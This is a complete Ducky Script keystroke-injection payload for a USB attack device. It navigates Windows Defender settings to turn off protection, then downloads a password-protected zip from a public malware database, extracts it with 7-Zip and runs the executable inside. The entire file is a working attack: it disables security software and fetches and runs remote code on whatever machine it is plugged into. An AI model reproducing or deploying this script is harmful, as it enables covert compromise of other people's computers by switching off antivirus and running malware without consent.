REM Disable windows defender
DELAY 2000
GUI
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 4000
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 2000
ENTER
DELAY 1000
SPACE
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
TAB
SPACE
DELAY 1000
TAB
SPACE
DELAY 1000
TAB
TAB
SPACE
DELAY 500
DELAY 500
ALT F4
DELAY 500
REM Download the zip
GUI r
DELAY 300
REM put any auto download link for a zip file here,but must change lines 60 & 64 then too
STRING https://github.com/Endermanch/MalwareDatabase/blob/master/jokes/ChilledWindows.zip?raw=true
ENTER
DELAY 3000
GUI r
DELAY 300
STRING cmd.exe
ENTER
DELAY 300
REM extract exe from zip using 7zip <-- required !
STRING cd %USERPROFILE%\Downloads
ENTER
DELAY 50
REM put 7zip in PATH to use it in cmd
STRING set PATH=%PATH%;C:\Program Files\7-Zip\
ENTER
DELAY 1000
REM extract the file (with password)
STRING 7z x ChilledWindows.zip -p mysubsarethebest
ENTER
DELAY 500
REM run it
STRING Endermanch@CHilledWindows.exe
ENTER
DELAY 50
GUI d